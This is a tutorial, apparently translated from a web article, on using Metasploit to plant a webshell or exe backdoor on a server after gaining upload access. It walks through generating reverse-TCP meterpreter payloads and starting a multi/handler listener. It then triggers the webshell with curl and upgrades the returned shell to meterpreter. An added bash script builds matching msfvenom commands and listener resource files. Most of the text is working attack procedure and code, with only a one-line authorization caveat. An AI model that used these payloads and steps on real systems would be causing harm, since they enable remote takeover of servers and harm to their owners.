Metasploit-Privilege Escalation using webshell

Source: Internet
Author: User

The methods described in this article may only be tested on machines you are authorized to test.
 
First, I suggest you look up how meterpreter is used; there is plenty of material on the Internet. This article explains why msf is used for privilege escalation (because msf has meterpreter, which is very powerful ^_^).
Metasploit has two tools, msfpayload and msfencode. They generate not only exe backdoors but also webshells written in web scripting languages. After generating a webshell, you set up a listener and then request the webshell URL; with luck, you get a session back for further use. (In current Metasploit releases msfpayload and msfencode have been retired and merged into msfvenom, which takes the same payload names.)
The specific usage is as follows.
You can list the payloads in msf (msfpayload -l) and note the path of the one you want. Then generate the webshell with the following command; it is the same usage of msfpayload as above, except that a web script file is produced instead of an exe:
Generate webshell:
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip R | msfencode -t asp -o webshell.asp
Then upload webshell.asp to the server (this step requires that you already have a way to upload files to the target).
Then start msfconsole and enter:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (the same payload that was given to msfpayload above)
set LHOST your_ip
exploit
Then request the webshell URL, for example with curl: curl http://www.bkjia.com/webshell.asp. If the exploit succeeds, a meterpreter session is returned in msfconsole. How to use meterpreter itself is not covered here; there are many references online.
However, when I used NetBox to set up an ASP environment, I always got execution errors. I hope readers will verify this themselves before relying on it.
Besides asp, you can also generate php and jsp webshells; use the -t parameter of msfencode to specify the script type. I think a php webshell is more likely to succeed.
 
In addition, if you can both upload a file to the server and execute it there, you can upload a backdoor generated by msfpayload, set up the listener, run the backdoor to get a session back, and then convert that session to meterpreter, so that all of meterpreter's features are available. The steps are as follows (the prerequisites are as described above):
1. msfpayload windows/shell_reverse_tcp LHOST=your_ip R | msfencode -t exe -o test.exe
2. Open msfconsole (in another terminal).
3. Set up the listener (this sounds advanced, but don't be scared by it): use exploit/multi/handler, set PAYLOAD windows/shell_reverse_tcp (matching the payload from step 1), set LHOST your_ip, then exploit.
4. Upload test.exe to the server.
5. Execute test.exe on the server; a shell is returned to the listener.
6. Convert the Windows shell to a meterpreter shell: because the payload used was shell_reverse_tcp, what comes back in the listener is a Windows shell (a Windows command prompt), not a meterpreter shell. To convert it, press Ctrl+Z to put the Windows shell in the background, then run the sessions command to find the number of that shell session.
Run sessions -u <number> (number is the session number of the Windows shell you found). This spawns a meterpreter shell, and meterpreter's powerful features can then be used. Errors may occur; read the error message carefully and paste part of it into Google.
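The two procedures above share one failure mode a practitioner should check for: the payload named when generating the webshell or exe, and the PAYLOAD, LHOST and LPORT configured in exploit/multi/handler, must agree, otherwise the callback arrives but no usable session is created. The script below is an added example, not code from the original article; it builds the generation command and the handler resource script from one set of values and checks that they match. It assumes msfvenom (the current replacement for the msfpayload | msfencode pipe) and uses placeholder values 10.0.0.5 and 4444 for LHOST and LPORT.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): derive the payload
# generation command and the multi/handler resource script from the same
# values, then verify they match before starting anything.
# Assumptions: msfvenom replaces msfpayload/msfencode; LHOST/LPORT are
# placeholder attacker-side values, override them via the environment.
set -u

LHOST="${LHOST:-10.0.0.5}"   # placeholder attacker IP
LPORT="${LPORT:-4444}"       # placeholder listener port

# Print the msfvenom command for a payload, output format and output file.
# $1 payload name (e.g. windows/meterpreter/reverse_tcp)
# $2 output format (asp, php, jsp, exe)   $3 output file name
gen_payload_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
    "$1" "$LHOST" "$LPORT" "$2" "$3"
}

# Write an msfconsole resource script that starts exploit/multi/handler for
# the given payload as a background job and keeps listening after the first
# session, so the webshell can be triggered more than once.
# $1 payload name   $2 path of the .rc file to write
write_handler_rc() {
  cat > "$2" <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Return 0 when the payload, LHOST and LPORT in a msfvenom command line agree
# with the handler .rc, 1 otherwise.
# $1 msfvenom command string   $2 path of the .rc file
check_match() {
  local cmd_payload cmd_host cmd_port rc_payload rc_host rc_port
  cmd_payload=$(printf '%s' "$1" | sed -n 's/.*-p \([^ ]*\).*/\1/p')
  cmd_host=$(printf '%s' "$1" | sed -n 's/.*LHOST=\([^ ]*\).*/\1/p')
  cmd_port=$(printf '%s' "$1" | sed -n 's/.*LPORT=\([^ ]*\).*/\1/p')
  rc_payload=$(awk '$1=="set" && $2=="PAYLOAD" {print $3}' "$2")
  rc_host=$(awk '$1=="set" && $2=="LHOST" {print $3}' "$2")
  rc_port=$(awk '$1=="set" && $2=="LPORT" {print $3}' "$2")
  if [ "$cmd_payload" = "$rc_payload" ] && [ "$cmd_host" = "$rc_host" ] \
     && [ "$cmd_port" = "$rc_port" ]; then
    return 0
  fi
  return 1
}

# Demo: the webshell from the first procedure and the exe from the second,
# with one handler configured for the meterpreter payload only.
WEBSHELL_CMD=$(gen_payload_cmd windows/meterpreter/reverse_tcp asp webshell.asp)
EXE_CMD=$(gen_payload_cmd windows/shell_reverse_tcp exe test.exe)
RC_FILE="${RC_FILE:-handler.rc}"
write_handler_rc windows/meterpreter/reverse_tcp "$RC_FILE"

echo "$WEBSHELL_CMD"
check_match "$WEBSHELL_CMD" "$RC_FILE" && echo "webshell.asp matches $RC_FILE"
echo "$EXE_CMD"
check_match "$EXE_CMD" "$RC_FILE" \
  || echo "test.exe does NOT match $RC_FILE: start a second handler with set PAYLOAD windows/shell_reverse_tcp"
```

Run the printed msfvenom commands, start the listener with msfconsole -r handler.rc, and then trigger the webshell (curl http://target/webshell.asp) or execute test.exe on the target. The plain shell returned by test.exe is upgraded with sessions -u <number> as described in step 6; the mismatch branch in the demo is exactly the case where that upgrade never becomes possible because the handler expected a meterpreter stager.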
Readers may ask: since an exe can be uploaded and executed, why not just upload a full-featured Trojan directly, which would be more convenient? My answer is that msf has the powerful Meterpreter.
To sum up, give it a try. Some payloads do not work, and you may make some unexpected discoveries.
